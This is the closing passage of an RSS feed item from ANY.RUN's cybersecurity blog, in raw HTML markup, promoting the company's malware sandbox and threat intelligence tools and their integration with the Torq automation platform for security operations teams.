<p class="wp-block-paragraph">Trusted by over 600,000 cybersecurity professionals and 15,000+ organizations worldwide,&nbsp;<a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>&nbsp;helps security teams investigate threats faster and with greater accuracy.&nbsp;</p>



<p class="wp-block-paragraph">Our&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktosblanding" target="_blank" rel="noreferrer noopener"><strong>Interactive&nbsp;Sandbox</strong></a>&nbsp;accelerates incident response by allowing you to analyze suspicious files in real time, while our&nbsp;<strong>Threat Intelligence solutions&nbsp;(</strong><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktolookuplanding" target="_blank" rel="noreferrer noopener"><strong>TI Lookup</strong></a><strong>&nbsp;and&nbsp;</strong><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktofeedslanding" target="_blank" rel="noreferrer noopener"><strong>TI Feeds</strong></a><strong>)&nbsp;</strong>provide the necessary context to&nbsp;anticipate&nbsp;and stop today’s most advanced attacks.&nbsp;</p>



<p class="wp-block-paragraph">The integration of&nbsp;<strong>ANY.RUN with Torq</strong>&nbsp;adds a specialized layer of malware analysis, phishing detection, and IOC enrichment to your security operations. By&nbsp;utilizing&nbsp;these automated workflows, SOC teams can seamlessly embed ANY.RUN’s deep visibility into their existing triage and incident response flows.&nbsp;</p>
<p>The post <a href="https://any.run/cybersecurity-blog/torq-integration/">ANY.RUN &amp; Torq Integration: Scale Triage &amp; Respond with Confidence</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/torq-integration/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>